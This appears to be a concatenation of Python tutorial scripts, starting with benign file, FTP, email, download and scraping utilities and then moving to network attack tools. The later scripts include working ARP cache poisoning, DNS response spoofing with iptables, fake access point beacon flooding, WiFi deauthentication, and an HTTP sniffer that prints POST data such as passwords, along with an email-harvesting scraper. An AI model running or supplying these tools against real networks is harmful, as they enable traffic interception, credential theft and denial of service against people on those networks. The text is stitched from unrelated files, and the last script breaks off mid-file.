print("randfloat between 5.0 and 10.0:", randfloat)
l = list(range(10))
print("Before shuffle:", l)
random.shuffle(l)
print("After shuffle:", l)
# generate a random string
randstring = ''.join(random.sample(string.ascii_letters, 16))
print("Random string with 16 characters:", randstring)
# crypto-safe byte generation
randbytes_crypto = os.urandom(16)
print("Random bytes for crypto use using os:", randbytes_crypto)
# or use this
randbytes_crypto = secrets.token_bytes(16)
print("Random bytes for crypto use using secrets:", randbytes_crypto)
# crypto-secure string generation
randstring_crypto = secrets.token_urlsafe(16)
print("Random strings for crypto use:", randstring_crypto)
# crypto-secure bits generation
randbits_crypto = secrets.randbits(16)
print("Random 16-bits for crypto use:", randbits_crypto)
import os
# print the current directory
print("The current directory:", os.getcwd())
# make an empty directory (folder)
os.mkdir("folder")
# running mkdir again with the same name raises FileExistsError, run this instead:
# if not os.path.isdir("folder"):
# os.mkdir("folder")
# changing the current directory to 'folder'
os.chdir("folder")
# printing the current directory now
print("The current directory changing the directory to folder:", os.getcwd())
# go back a directory
os.chdir("..")
# make several nested directories
os.makedirs("nested1/nested2/nested3")
# create a new text file
text_file = open("text.txt", "w")
# write to this file some text
text_file.write("This is a text file")
# rename text.txt to renamed-text.txt
os.rename("text.txt", "renamed-text.txt")
# replace (move) this file to another directory
os.replace("renamed-text.txt", "folder/renamed-text.txt")
# print all files and folders in the current directory
print("All folders & files:", os.listdir())
# print all files & folders recursively
for dirpath, dirnames, filenames in os.walk("."):
# iterate over directories
for dirname in dirnames:
print("Directory:", os.path.join(dirpath, dirname))
# iterate over files
for filename in filenames:
print("File:", os.path.join(dirpath, filename))
# delete that file
os.remove("folder/renamed-text.txt")
# remove the folder
os.rmdir("folder")
# remove nested folders
os.removedirs("nested1/nested2/nested3")
open("text.txt", "w").write("This is a text file")
# print some stats about the file
print(os.stat("text.txt"))
# get the file size for example
print("File size:", os.stat("text.txt").st_size)
import ftplib
import os
from datetime import datetime
FTP_HOST = "ftp.ed.ac.uk"
FTP_USER = "anonymous"
FTP_PASS = ""
# some utility functions that we gonna need
def get_size_format(n, suffix="B"):
# converts bytes to scaled format (e.g KB, MB, etc.)
for unit in ["", "K", "M", "G", "T", "P"]:
if n < 1024:
return f"{n:.2f}{unit}{suffix}"
n /= 1024
def get_datetime_format(date_time):
# convert to datetime object
date_time = datetime.strptime(date_time, "%Y%m%d%H%M%S")
# convert to human readable date time string
return date_time.strftime("%Y/%m/%d %H:%M:%S")
# initialize FTP session
ftp = ftplib.FTP(FTP_HOST, FTP_USER, FTP_PASS)
# force UTF-8 encoding
ftp.encoding = "utf-8"
# print the welcome message
print(ftp.getwelcome())
# change the current working directory to 'pub' folder and 'maps' subfolder
ftp.cwd("pub/maps")
# LIST a directory
print("*"*50, "LIST", "*"*50)
ftp.dir()
# NLST command
print("*"*50, "NLST", "*"*50)
print("{:20} {}".format("File Name", "File Size"))
for file_name in ftp.nlst():
file_size = "N/A"
try:
ftp.cwd(file_name)
except Exception as e:
ftp.voidcmd("TYPE I")
file_size = get_size_format(ftp.size(file_name))
print(f"{file_name:20} {file_size}")
print("*"*50, "MLSD", "*"*50)
# using the MLSD command
print("{:30} {:19} {:6} {:5} {:4} {:4} {:4} {}".format("File Name", "Last Modified", "Size",
"Perm","Type", "GRP", "MODE", "OWNER"))
for file_data in ftp.mlsd():
# extract returning data
file_name, meta = file_data
# i.e directory, file or link, etc
file_type = meta.get("type")
if file_type == "file":
# if it is a file, change type of transfer data to IMAGE/binary
ftp.voidcmd("TYPE I")
# get the file size in bytes
file_size = ftp.size(file_name)
# convert it to human readable format (i.e in 'KB', 'MB', etc)
file_size = get_size_format(file_size)
else:
# not a file, may be a directory or other types
file_size = "N/A"
# date of last modification of the file
last_modified = get_datetime_format(meta.get("modify"))
# file permissions
permission = meta.get("perm")
# get the file unique id
unique_id = meta.get("unique")
# user group
unix_group = meta.get("unix.group")
# file mode, unix permissions
unix_mode = meta.get("unix.mode")
# owner of the file
unix_owner = meta.get("unix.owner")
# print all
print(f"{file_name:30} {last_modified:19} {file_size:7} {permission:5} {file_type:4} {unix_group:4} {unix_mode:4} {unix_owner}")
# quit and close the connection
ftp.quit()
import imaplib
import email
from email.header import decode_header
import webbrowser
import os
# account credentials
username = "youremailaddressprovider.com"
password = "yourpassword"
# number of top emails to fetch
N = 3
# create an IMAP4 class with SSL, use your email provider's IMAP server
imap = imaplib.IMAP4_SSL("imap.gmail.com")
# authenticate
imap.login(username, password)
# select a mailbox (in this case, the inbox mailbox)
# use imap.list() to get the list of mailboxes
status, messages = imap.select("INBOX")
# total number of emails
messages = int(messages[0])
for i in range(messages-4, messages-N-4, -1):
# fetch the email message by ID
res, msg = imap.fetch(str(i), "(RFC822)")
for response in msg:
if isinstance(response, tuple):
# parse a bytes email into a message object
msg = email.message_from_bytes(response[1])
# decode the email subject
subject = decode_header(msg["Subject"])[0][0]
if isinstance(subject, bytes):
# if it's a bytes, decode to str
subject = subject.decode()
# email sender
from_ = msg.get("From")
print("Subject:", subject)
print("From:", from_)
# if the email message is multipart
if msg.is_multipart():
# iterate over email parts
for part in msg.walk():
# extract content type of email
content_type = part.get_content_type()
content_disposition = str(part.get("Content-Disposition"))
try:
# get the email body
body = part.get_payload(decode=True).decode()
except:
pass
if content_type == "text/plain" and "attachment" not in content_disposition:
# print text/plain emails and skip attachments
print(body)
elif "attachment" in content_disposition:
# download attachment
filename = part.get_filename()
if filename:
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filepath = os.path.join(subject, filename)
# download attachment and save it
open(filepath, "wb").write(part.get_payload(decode=True))
else:
# extract content type of email
content_type = msg.get_content_type()
# get the email body
body = msg.get_payload(decode=True).decode()
if content_type == "text/plain":
# print only text email parts
print(body)
if content_type == "text/html":
# if it's HTML, create a new HTML file and open it in browser
if not os.path.isdir(subject):
# make a folder for this email (named after the subject)
os.mkdir(subject)
filename = f"{subject[:50]}.html"
filepath = os.path.join(subject, filename)
# write the file
open(filepath, "w").write(body)
# open in the default browser
webbrowser.open(filepath)
print("="*100)
# close the connection and logout
imap.close()
imap.logout()
import requests
from concurrent.futures import ThreadPoolExecutor
from time import perf_counter
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
with ThreadPoolExecutor(max_workers=n_threads) as pool:
pool.map(download, urls)
print(f"Time took: {perf_counter() - t:.2f}s")
import requests
from threading import Thread
from queue import Queue
# thread-safe queue initialization
q = Queue()
# number of threads to spawn
n_threads = 5
# read 1024 bytes every time
buffer_size = 1024
def download():
global q
while True:
# get the url from the queue
url = q.get()
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
# we're done downloading the file
q.task_done()
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
# fill the queue with all the urls
for url in urls:
q.put(url)
# start the threads
for t in range(n_threads):
worker = Thread(target=download)
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
# wait until the queue is empty
q.join()
import requests
from time import perf_counter
# read 1024 bytes every time
buffer_size = 1024
def download(url):
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the file name
filename = url.split("/")[-1]
with open(filename, "wb") as f:
for data in response.iter_content(buffer_size):
# write data read to the file
f.write(data)
if __name__ == "__main__":
urls = [
"https://cdn.pixabay.com/photo/2018/01/14/23/12/nature-3082832__340.jpg",
"https://cdn.pixabay.com/photo/2013/10/02/23/03/dawn-190055__340.jpg",
"https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197__340.jpg",
"https://cdn.pixabay.com/photo/2016/11/29/05/45/astronomy-1867616__340.jpg",
"https://cdn.pixabay.com/photo/2014/07/28/20/39/landscape-404072__340.jpg",
] * 5
t = perf_counter()
for url in urls:
download(url)
print(f"Time took: {perf_counter() - t:.2f}s")
from scapy.all import Ether, ARP, srp, sniff, conf
def get_mac(ip):
"""
Returns the MAC address of ip, if it is unable to find it
for some reason, throws IndexError
"""
p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)
result = srp(p, timeout=3, verbose=False)[0]
return result[0][1].hwsrc
def process(packet):
# if the packet is an ARP packet
if packet.haslayer(ARP):
# if it is an ARP response (ARP reply)
if packet[ARP].op == 2:
try:
# get the real MAC address of the sender
real_mac = get_mac(packet[ARP].psrc)
# get the MAC address from the packet sent to us
response_mac = packet[ARP].hwsrc
# if they're different, definetely there is an attack
if real_mac != response_mac:
print(f"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}")
except IndexError:
# unable to find the real mac
# may be a fake IP or firewall is blocking packets
pass
if __name__ == "__main__":
import sys
try:
iface = sys.argv[1]
except IndexError:
iface = conf.iface
sniff(store=False, prn=process, iface=iface)
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs target_ip saying that we are host_ip.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of host_ip ) to target_ip
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the target that we are the host
spoof(target, host, verbose)
# telling the host that we are the target
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
import win32serviceutil
import time
class WService:
def __init__(self, service, machine=None, verbose=False):
self.service = service
self.machine = machine
self.verbose = verbose
property
def running(self):
return win32serviceutil.QueryServiceStatus(self.service)[1] == 4
def start(self):
if not self.running:
win32serviceutil.StartService(self.service)
time.sleep(1)
if self.running:
if self.verbose:
print(f"[+] {self.service} started successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is already running.")
def stop(self):
if self.running:
win32serviceutil.StopService(self.service)
time.sleep(0.5)
if not self.running:
if self.verbose:
print(f"[+] {self.service} stopped successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot stop {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def restart(self):
if self.running:
win32serviceutil.RestartService(self.service)
time.sleep(2)
if self.running:
if self.verbose:
print(f"[+] {self.service} restarted successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def main(action, service):
service = WService(service, verbose=True)
if action == "start":
service.start()
elif action == "stop":
service.stop()
elif action == "restart":
service.restart()
# getattr(remoteAccessService, action, "start")()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Windows Service Handler")
parser.add_argument("service")
parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
action="store", required=True, dest="action")
given_args = parser.parse_args()
service, action = given_args.service, given_args.action
main(action, service)
from scapy.all import *
import time
hosts = []
Ether = 1
def listen_dhcp():
# Make sure it is DHCP with the filter options
k = sniff(prn=print_packet, filter='udp and (port 67 or port 68)')
def print_packet(packet):
target_mac, requested_ip, hostname, vendor_id = [None] * 4
if packet.haslayer(Ether):
target_mac = packet.getlayer(Ether).src
# get the DHCP options
dhcp_options = packet[DHCP].options
for item in dhcp_options:
try:
label, value = item
except ValueError:
continue
if label == 'requested_addr':
requested_ip = value
elif label == 'hostname':
hostname = value.decode()
elif label == 'vendor_class_id':
vendor_id = value.decode()
if target_mac and vendor_id and hostname and requested_ip and target_mac not in hosts:
hosts.append(target_mac)
time_now = time.strftime("[%Y-%m-%d - %H:%M:%S] ")
print("{}: {} - {} / {} requested {}".format(time_now, target_mac, hostname, vendor_id, requested_ip))
if __name__ == "__main__":
listen_dhcp()
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
# DNS mapping records, feel free to add/modify this dictionary
# for example, google.com will be redirected to 192.168.1.100
dns_hosts = {
b"www.google.com.": "192.168.1.100",
b"google.com.": "192.168.1.100",
b"facebook.com.": "172.217.19.142"
}
def process_packet(packet):
"""
Whenever a new packet is redirected to the netfilter queue,
this callback is called.
"""
# convert netfilter queue packet to scapy packet
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
# if the packet is a DNS Resource Record (DNS reply)
# modify the packet
print("[Before]:", scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
# not UDP packet, this can be IPerror/UDPerror packets
pass
print("[After ]:", scapy_packet.summary())
# set back as netfilter queue packet
packet.set_payload(bytes(scapy_packet))
# accept the packet
packet.accept()
def modify_packet(packet):
"""
Modifies the DNS Resource Record packet ( the answer part)
to map our globally defined dns_hosts dictionary.
For instance, whenver we see a google.com answer, this function replaces
the real IP address (172.217.19.142) with fake IP address (192.168.1.100)
"""
# get the DNS question name, the domain name
qname = packet[DNSQR].qname
if qname not in dns_hosts:
# if the website isn't in our record
# we don't wanna modify that
print("no modification:", qname)
return packet
# craft new answer, overriding the original
# setting the rdata for the IP we want to redirect (spoofed)
# for instance, google.com will be mapped to "192.168.1.100"
packet[DNS].an = DNSRR(rrname=qname, rdata=dns_hosts[qname])
# set the answer count to 1
packet[DNS].ancount = 1
# delete checksums and length of packet, because we have modified the packet
# new calculations are required ( scapy will do automatically )
del packet[IP].len
del packet[IP].chksum
del packet[UDP].len
del packet[UDP].chksum
# return the modified packet
return packet
if __name__ == "__main__":
QUEUE_NUM = 0
# insert the iptables FORWARD rule
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
# instantiate the netfilter queue
queue = NetfilterQueue()
try:
# bind the queue number to our callback process_packet
# and start it
queue.bind(QUEUE_NUM, process_packet)
queue.run()
except KeyboardInterrupt:
# if want to exit, make sure we
# remove that rule we just inserted, going back to normal.
os.system("iptables --flush")
from scapy.all import *
from threading import Thread
from faker import Faker
def send_beacon(ssid, mac, infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# type=0: management frame
# subtype=8: beacon frame
# addr1: MAC address of the receiver
# addr2: MAC address of the sender
# addr3: MAC address of the Access Point (AP)
# beacon frame
beacon = Dot11Beacon()
# we inject the ssid name
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
# stack all the layers and add a RadioTap
frame = RadioTap()/dot11/beacon/essid
# send the frame
if infinite:
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
else:
sendp(frame, iface=iface, verbose=0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Fake Access Point Generator")
parser.add_argument("interface", default="wlan0mon", help="The interface to send beacon frames with, must be in monitor mode")
parser.add_argument("-n", "--access-points", dest="n_ap", help="Number of access points to be generated")
args = parser.parse_args()
n_ap = args.n_ap
iface = args.interface
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(n_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from colorama import init, Fore
# initialize colorama
init()
# define colors
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
def sniff_packets(iface=None):
"""
Sniff 80 port packets with iface, if None (default), then the
scapy's default interface is used
"""
if iface:
# port 80 for http (generally)
# process_packet is the callback
sniff(filter="port 80", prn=process_packet, iface=iface, store=False)
else:
# sniff with default interface
sniff(filter="port 80", prn=process_packet, store=False)
def process_packet(packet):
"""
This function is executed whenever a packet is sniffed
"""
if packet.haslayer(HTTPRequest):
# if this packet is an HTTP Request
# get the requested URL
url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
# get the requester's IP Address
ip = packet[IP].src
# get the request method
method = packet[HTTPRequest].Method.decode()
print(f"\n{GREEN}[+] {ip} Requested {url} with {method}{RESET}")
if show_raw and packet.haslayer(Raw) and method == "POST":
# if show_raw flag is enabled, has raw data, and the requested method is "POST"
# then show raw
print(f"\n{RED}[*] Some useful Raw data: {packet[Raw].load}{RESET}")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="HTTP Packet Sniffer, this is useful when you're a man in the middle." \
+ "It is suggested that you run arp spoof before you use this script, otherwise it'll sniff your personal packets")
parser.add_argument("-i", "--iface", help="Interface to use, default is scapy's default interface")
parser.add_argument("--show-raw", dest="show_raw", action="store_true", help="Whether to print POST raw data, such as passwords, search queries, etc.")
# parse arguments
args = parser.parse_args()
iface = args.iface
show_raw = args.show_raw
sniff_packets(iface)
from scapy.all import *
def deauth(target_mac, gateway_mac, inter=0.1, count=None, loop=1, iface="wlan0mon", verbose=1):
# 802.11 frame
# addr1: destination MAC
# addr2: source MAC
# addr3: Access Point MAC
dot11 = Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# stack them up
packet = RadioTap()/dot11/Dot11Deauth(reason=7)
# send the packet
sendp(packet, inter=inter, count=count, loop=loop, iface=iface, verbose=verbose)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="A python script for sending deauthentication frames")
parser.add_argument("target", help="Target MAC address to deauthenticate.")
parser.add_argument("gateway", help="Gateway MAC address that target is authenticated with")
parser.add_argument("-c" , "--count", help="number of deauthentication frames to send, specify 0 to keep sending infinitely, default is 0", default=0)
parser.add_argument("--interval", help="The sending frequency between two frames sent, default is 100ms", default=0.1)
parser.add_argument("-i", dest="iface", help="Interface to use, must be in monitor mode, default is 'wlan0mon'", default="wlan0mon")
parser.add_argument("-v", "--verbose", help="wether to print messages", action="store_true")
args = parser.parse_args()
target = args.target
gateway = args.gateway
count = int(args.count)
interval = float(args.interval)
iface = args.iface
verbose = args.verbose
if count == 0:
# if count is 0, it means we loop forever (until interrupt)
loop = 1
count = None
else:
loop = 0
# printing some info messages"
if verbose:
if count:
print(f"[+] Sending {count} frames every {interval}s...")
else:
print(f"[+] Sending frames every {interval}s for ever...")
deauth(target, gateway, interval, count, loop, iface, verbose)
from scapy.all import ARP, Ether, srp
target_ip = "192.168.1.1/24"
# IP Address for the destination
# create ARP packet
arp = ARP(pdst=target_ip)
# create the Ether broadcast packet
# ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
# stack them
packet = ether/arp
result = srp(packet, timeout=3, verbose=0)[0]
# a list of clients, we will fill this in the upcoming loop
clients = []
for sent, received in result:
# for each response, append ip and mac address to clients list
clients.append({'ip': received.psrc, 'mac': received.hwsrc})
# print clients
print("Available devices in the network:")
print("IP" + " "*18+"MAC")
for client in clients:
print("{:16} {}".format(client['ip'], client['mac']))
from scapy.all import *
from threading import Thread
import pandas
import time
import os
import sys
# initialize the networks dataframe that will contain all access points nearby
networks = pandas.DataFrame(columns=["BSSID", "SSID", "dBm_Signal", "Channel", "Crypto"])
# set the index BSSID (MAC address of the AP)
networks.set_index("BSSID", inplace=True)
def callback(packet):
if packet.haslayer(Dot11Beacon):
# extract the MAC address of the network
bssid = packet[Dot11].addr2
# get the name of it
ssid = packet[Dot11Elt].info.decode()
try:
dbm_signal = packet.dBm_AntSignal
except:
dbm_signal = "N/A"
# extract network stats
stats = packet[Dot11Beacon].network_stats()
# get the channel of the AP
channel = stats.get("channel")
# get the crypto
crypto = stats.get("crypto")
networks.loc[bssid] = (ssid, dbm_signal, channel, crypto)
def print_all():
while True:
os.system("clear")
print(networks)
time.sleep(0.5)
def change_channel():
ch = 1
while True:
os.system(f"iwconfig {interface} channel {ch}")
# switch channel from 1 to 14 each 0.5s
ch = ch % 14 + 1
time.sleep(0.5)
if __name__ == "__main__":
# interface name, check using iwconfig
interface = sys.argv[1]
# start the thread that prints all the networks
printer = Thread(target=print_all)
printer.daemon = True
printer.start()
# start the channel changer
channel_changer = Thread(target=change_channel)
channel_changer.daemon = True
channel_changer.start()
# start sniffing
sniff(prn=callback, iface=interface)
import requests
import os
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
soup = bs(requests.get(url).content, "html.parser")
urls = []
for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given an URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
from requests_html import HTMLSession
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin, urlparse
import os
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_images(url):
"""
Returns all image URLs on a single url
"""
# initialize the session
session = HTMLSession()
# make the HTTP request and retrieve response
response = session.get(url)
# execute Javascript
response.html.render()
# construct the soup parser
soup = bs(response.html.html, "html.parser")
urls = []
for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src") or img.attrs.get("data-src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given an URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
import re
from requests_html import HTMLSession
import sys
url = sys.argv[1]
EMAIL_REGEX = r"""(?:[a-z0-9!#%&'*+/=?^_{|}-]+(?:\.[a-z0-9!#%&'*+/=?^_{|}-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""
# initiate an HTTP session
session = HTMLSession()
# get the HTTP Response
r = session.get(url)
# for JAVA-Script driven websites
r.html.render()
with open(sys.argv[2], "a") as f:
for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()):
print(re_match.group().strip(), file=f)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
# initialize an HTTP session
session = HTMLSession()
def get_all_forms(url):
"""Returns all form tags found on a web page's url """
# GET request
res = session.get(url)
# for javascript driven website
# res.html.render()
soup = BeautifulSoup(res.html.html, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""Returns the HTML details of a form,
including action, method and list of form controls (inputs, etc)"""
details = {}
# get the form action (requested URL)
action = form.attrs.get("action").lower()
# get the form method (POST, GET, DELETE, etc)
# if not specified, GET is the default in HTML
method = form.attrs.get("method", "get").lower()
# get all form inputs
inputs = []
for input_tag in form.find_all("input"):
# get type of input form control
input_type = input_tag.attrs.get("type", "text")
# get name attribute
input_name = input_tag.attrs.get("name")
# get the default value of that input tag
input_value =input_tag.attrs.get("value", "")
# add everything to that list
inputs.append({"type": input_type, "name": input_name, "value": input_value})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
if __name__ == "__main__":
import sys
# get URL from the command line
url = sys.argv[1]
# get all form tags
forms = get_all_forms(url)
# iteratte over forms
for i, form in enumerate(forms, start=1):
form_details = get_form_details(form)
print("="*50, f"form #{i}", "="*50)
pprint(form_details)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
from urllib.parse import urljoin
import webbrowser
import sys
from form_extractor import get_all_forms, get_form_details, session
# get the URL from the command line
url = sys.argv[1]
# get the first form (edit this as you wish)
